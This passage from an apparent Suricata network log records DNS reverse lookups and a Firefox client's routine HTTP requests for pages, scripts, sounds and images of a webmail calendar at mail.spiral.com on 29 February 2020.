{"timestamp":"2020-02-29T00:22:27.010384+0000","flow_id":256953625804596,"event_type":"flow","src_ip":"192.168.10.122","src_port":54415,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:17:26.393012+0000","end":"2020-02-29T00:17:26.501632+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:28.003172+0000","flow_id":1424381571475841,"event_type":"flow","src_ip":"192.168.10.122","src_port":34842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:17:27.371073+0000","end":"2020-02-29T00:17:27.479187+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:28.003571+0000","flow_id":1466579625143878,"event_type":"flow","src_ip":"192.168.10.122","src_port":60762,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:17:27.159302+0000","end":"2020-02-29T00:17:27.267472+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:29.476921+0000","flow_id":1547093101856505,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41150,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":59344,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:29.588304+0000","flow_id":1547093101856505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41150,"proto":"UDP","dns":{"type":"answer","id":59344,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:29.588304+0000","flow_id":1547093101856505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41150,"proto":"UDP","dns":{"type":"answer","id":59344,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:29.724003+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8088}} {"timestamp":"2020-02-29T00:22:30.000603+0000","flow_id":645583741745750,"event_type":"flow","src_ip":"192.168.10.122","src_port":51707,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:17:29.293462+0000","end":"2020-02-29T00:17:29.401593+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:31.987599+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8088},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47027,"tx_id":0}} {"timestamp":"2020-02-29T00:22:31.998142+0000","flow_id":945608701983486,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59959,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64994,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:32.109469+0000","flow_id":945608701983486,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59959,"proto":"UDP","dns":{"type":"answer","id":64994,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:32.109469+0000","flow_id":945608701983486,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59959,"proto":"UDP","dns":{"type":"answer","id":64994,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:32.243374+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24488}} {"timestamp":"2020-02-29T00:22:32.262695+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24488},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:22:32.265743+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451}} {"timestamp":"2020-02-29T00:22:32.277233+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":10823,"tx_id":2}} {"timestamp":"2020-02-29T00:22:32.277645+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470}} {"timestamp":"2020-02-29T00:22:32.301116+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":17678,"tx_id":3}} {"timestamp":"2020-02-29T00:22:32.301648+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046}} {"timestamp":"2020-02-29T00:22:32.316886+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046},"app_proto":"http","fileinfo":{"filename":"\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":10406,"tx_id":4}} {"timestamp":"2020-02-29T00:22:32.317655+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376}} {"timestamp":"2020-02-29T00:22:32.325552+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":24731,"tx_id":5}} {"timestamp":"2020-02-29T00:22:32.331346+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401}} {"timestamp":"2020-02-29T00:22:32.332479+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401},"app_proto":"http","fileinfo":{"filename":"\/js\/colorpicker.js","state":"CLOSED","stored":false,"size":12973,"tx_id":6}} {"timestamp":"2020-02-29T00:22:32.332753+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566}} {"timestamp":"2020-02-29T00:22:32.339316+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24826},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/kronolith.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:22:32.341602+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":50590}} {"timestamp":"2020-02-29T00:22:32.362889+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566},"app_proto":"http","fileinfo":{"filename":"\/js\/form_ghost.js","state":"CLOSED","stored":false,"size":4231,"tx_id":7}} {"timestamp":"2020-02-29T00:22:32.363312+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168}} {"timestamp":"2020-02-29T00:22:32.365078+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688}} {"timestamp":"2020-02-29T00:22:32.365122+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363}} {"timestamp":"2020-02-29T00:22:32.366760+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/search-topbar.png","state":"CLOSED","stored":false,"size":363,"tx_id":1}} {"timestamp":"2020-02-29T00:22:32.368121+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/doorbell.wav","state":"CLOSED","stored":false,"size":5168,"tx_id":8}} {"timestamp":"2020-02-29T00:22:32.370139+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/gnid3.wav","state":"CLOSED","stored":false,"size":13688,"tx_id":0}} {"timestamp":"2020-02-29T00:22:32.371064+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776}} {"timestamp":"2020-02-29T00:22:32.409302+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151}} {"timestamp":"2020-02-29T00:22:32.413250+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256}} {"timestamp":"2020-02-29T00:22:32.456633+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/theetone.wav","state":"CLOSED","stored":false,"size":24776,"tx_id":1}} {"timestamp":"2020-02-29T00:22:32.457564+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:22:32.458694+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/reminder.wav","state":"CLOSED","stored":false,"size":23151,"tx_id":9}} {"timestamp":"2020-02-29T00:22:32.458965+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292}} {"timestamp":"2020-02-29T00:22:32.459967+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-split.png","state":"CLOSED","stored":false,"size":74,"tx_id":2}} {"timestamp":"2020-02-29T00:22:32.463130+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101}} {"timestamp":"2020-02-29T00:22:32.466189+0000","flow_id":1506488481224280,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52962,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:22:32.463757+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/left.png","state":"CLOSED","stored":false,"size":292,"tx_id":10}} {"timestamp":"2020-02-29T00:22:32.464795+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} {"timestamp":"2020-02-29T00:22:32.466618+0000","flow_id":381567826925203,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52964,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358}} {"timestamp":"2020-02-29T00:22:32.467428+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/dayview.png","state":"CLOSED","stored":false,"size":349,"tx_id":11}} {"timestamp":"2020-02-29T00:22:32.468297+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 